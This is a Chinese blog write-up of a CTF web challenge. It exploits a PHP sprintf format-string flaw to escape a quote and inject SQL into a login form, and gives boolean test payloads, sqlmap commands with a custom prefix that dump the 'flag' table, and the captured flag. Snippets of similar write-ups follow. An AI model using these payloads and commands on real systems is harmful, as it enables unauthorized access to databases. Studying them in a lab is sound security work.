ctf-writeup-迎圣诞拿大奖-SQLi

最新推荐文章于 2021-04-04 09:08:23 发布
最新推荐文章于 2021-04-04 09:08:23 发布
阅读量357 收藏 1
点赞数
分类专栏: ctf-wp 文章标签: ctf 迎圣诞拿大奖 sqli writeup 格式化字符串漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/key_nothing/article/details/98609335
版权

打开连接,出现一个登录框:
在这里插入图片描述
尝试:扫目录、弱口令、源代码都没有什么发现
题目为sqli 猜测sql注入应该在登录处,转包丢sqlmap先跑一发,也没有结果。
尝试手工测一下,发现在用户名处输入%时居然有报错!
在这里插入图片描述
看报错提示,有sprintf()错误,瞬间想起了这个函数有格式化字符串漏洞,抓包尝试一番。
在这里插入图片描述
sprintf注入,或者说php格式化字符串注入的原理为:

要明白%后的一个字符(除了%,%上面表格已经给出了)都会被当作字符型类型而被吃掉,也就是被当作一个类型进行匹配后面的变量,比如%c匹配ascii码,%d匹配整数,如果不在定义的也会匹配,匹配空,比如%\,这样我们的目的只有一个,使得单引号逃逸,也就是能够起到闭合的作用。
构造payload:

username=admin%1$\' or 1=1#   
username=admin%1$\' or 1=2#

若第一个提示password error,第二个提示username error则说明此处存在注入。
在这里插入图片描述
在这里插入图片描述
添加sqlmap添加前缀的参数:–prefix="%1$’"继续跑

sqlmap -r'/root/Desktop/222/dsaf.txt' --prefix="%1$\'" -p username

在这里插入图片描述
爆数据库

sqlmap -r'/root/Desktop/222/dsaf.txt' --prefix="%1$\'" -p username --dbs

在这里插入图片描述
爆表

sqlmap -r'/root/Desktop/222/dsaf.txt' --prefix="%1$\'" -p username --tables -D"ctf"

在这里插入图片描述
爆字段

sqlmap -r'/root/Desktop/222/dsaf.txt' --prefix="%1$\'" -p username --columns -T"flag" -D"ctf" --dump

在这里插入图片描述
flag{b5b36121-86dd-a4db-aab3-86ddb749dfa1}成功拿到flag~

zc01@
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
圣诞拿大奖” 活动赛题 Web-SQLi
qq_34106499的博客
01-17 557
1. php中sprintf()函数漏洞原理及其利用; 2. mysql盲注语法及python脚本; 3. sqlmap的需要进一步学习;
CTF-writeup
03-19
在这个CTF-writeup中,我们将主要探讨与JavaScript相关的知识点,这是一种广泛用于Web开发的编程语言,也是CTF比赛中的常见挑战类型。 JavaScript是互联网上动态内容的基础,它允许网页与用户进行交互,执行实时...
圣诞拿大奖”活动赛题------------SQLi
大方子
08-29 1411
========================================= 个人收获 1.sprintf 格式漏洞   =========================================   题目     上来先扫下目录看下源码和http请求发现没有什么奇怪的地方,也就八九不离十是sql注入了   开始想尝试 万能密码 后来发现有过滤 尝试用...
[圣诞拿大奖] Sqli writeup
Flyour的博客
03-31 1060
Sqli 的writeup 拿到题目看到的就是一个登录框,可以根据经验进行尝试一下用户名=amdin,密码=admin,得到的结果是password error。然后随便换一个其他的名字进行登录,发现得到的结果是username error。从这里可以看到响应结果会反映出是用户名出错,还是密码出错。 然后尝试进行注入,试了万能密码等注入,结果一直是username error。一开始我以为是w...
"圣诞拿大奖"赛题——SQLI
Ramona的博客
12-22 673
0x01 本题所需知识清单: 1.php sprintf()函数漏洞:https://blog.csdn.net/WQ_BCJ/article/details/85057447 2.布尔盲注基本playload及流程:https://blog.csdn.net/WQ_BCJ/article/details/84592445 3.Burpsuit  Intruder暴力猜解:https://...
圣诞拿大奖活动赛题_SQLi(sprintf格式化字符)
a173262565的博客
04-08 159
看题目应该就是注入没跑了 先拿正常输入试试,输了admin,admin,结果返回password error!,说明还真的存在admin账户 拿常规注入语句试探一下admin' and 1=1%23,发生了报错 红框这里就给了我们提示,记得之前遇上过一个sprintf格式化字符串所引起的漏洞 具体原理可以参考下面这篇文章 sprintf格式化字符串带来的注入隐患 先...
ctf-writeup-crawler:CTF撰写的检索器
04-27
ctf-writeup-crawler CTF撰写的检索器 请确保已在配置了以下内容的计算机上安装并运行PostgreSQL 确保有一个名为ctfcrawler的数据库 确保有一个postgres用户/密码:ctfcrawler / ctfcrawler 该程序是在Eclipse ...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
SQLi-CTF-master.zip
04-09
CTF(Capture The Flag)是一种网络安全竞赛,参赛者通过解决各种安全挑战来获取积分,而SQLi-CTF通常是指在CTF比赛中涉及SQL注入的特定类型挑战。 在SQL注入攻击中,攻击者可以向应用程序输入恶意的SQL代码,以...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-“圣诞拿大奖”活动赛题SQLi
路漫漫其修远
07-26 320
分值:200分 类型:Web题目名称:SQLi 题目内容:find the flag. 解题步骤 进入链接,发现是个登录页面,没有注册的地方,填入admin&admin,提示password error! 分析报文,无异常 intruder一遍,发现username是admin%时报错 image.png 显然是sprintf的格式化问题导致单引号逃逸 尝试各种字符串后,...
圣诞拿大奖”活动赛题 SQLi
feng的博客
10-02 326
这题的新姿势就是利用sprintf格式化字符串漏洞来实现SQL注入。
圣诞拿大奖”活动赛题可恶的黑客
lovelj的博客
01-06 1983
话不多说,直接上图 1.每拿到这种题目,我首先直接导出http 2.在文件最后看见一个TXT 3.打开看见这个 4.既然看见了就看看呗,搜索他 5.发现有三个,一个一个打开看呗(发正也是蒙)发现第二个里面有一段Unicode编码 6.那就把它转转看看呗 7.不错,出来了,那就提交呗 什么,居然不对,再看看,没错,复制的对了 那就再看看, 发现flag变f1ag了 在提交,ok ...
[复现]ichunqiu“圣诞拿大奖”活动赛题-web-SQLi
baola的博客
11-14 249
sprintf字符串逃逸漏洞实现sql注入
SQLi 圣诞拿大奖”活动赛题 复现
weixin_34015336的博客
05-11 157
题目叫注入,先burp fuzz试一下 出来了一堆长度不一样的,还出了一个这个函数,这个函数大概问题就是 逃逸问题 比如输入%1$/' 他后端会把这个% 会吧1%/全部给吃掉,就导致单引号逃逸出来了 然后自己布尔盲注就上脚本跑就OK了 转载于:https://www.cnblogs.com/haozhizhi/p/10847167.html...
“百度杯”CTF比赛 九月场SQLi(多种姿势)
u011250160的博客
04-04 417
上题 进入网站,发现提示 按照提示访问http://91ad046335104584a1cc3f4e3a83513688ef3757714748d4.changame.ichunqiu.com/login.php?id=1 没有什么有用的信息 使用burpsuite抓包看下 同样没有什么有用的信息 用dirsearch扫下敏感目录 访问robots.txt出现nothing here 访问config.php没有得到信息 访问login.php得到error 访问index.php跳转到开始的load
百度杯”CTF比赛 九月场 SQLi
weixin_43858799的博客
05-19 753
1、打开题目 一篇空白 发现一直在loading 还以为是网卡没加载 刷新几遍之后 发现原来都是套路 2、根据提示flag在后台 用bp抓包进行测试 看到 login.php?id=1 通过URL进行访问 发现没有什么可以用的信息 再用bp抓包 也灭有可以用信息 最后实在没办法了 看了官方的WP 才知道存在index.php 文件 并在hearder中有提示 通过URL访问...
“百度杯”CTF比赛 九月场 类型:Web 题目名称:SQLi ---不需要逗号的注入技巧
wkend的博客
05-09 3877
今天在i春秋做题的时候遇到了移到非常好的题目,于是在参考了wp的基础上自己复现了一遍,算作一种技巧的学习与收藏吧。 题目i春秋连接:https://www.ichunqiu.com/battalion?t=1&r=54791 访问地址,发现什么都没有, 查看页面源代码,发现提示 访问地址 http://69ef94c7ef5e47b580ed5c7bae472bc4c3b...
CTFSqli-Labs题目解析(1-11题)
a690135443的博客
06-14 1321
第一题 提示输入numeric类型的ID作为参数,尝试在url后添加?id=1查看,发现有显示。 改为?id=-1后无显示,也无报错,于是可以考虑-1空出位置后加union select爆数据。 改为?id=1'单引号报错,双引号不报错,可以推断出使用单引号闭合,加上注释之后,错误也消失了,所以可以在这个时候union select了。 然后添加order by语句,?id=1' order by 4 --+,当order by 4的时候报错,所以一共有3个字段。 然后使用unio
bugku ctf sqli-0x1题解
最新发布
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值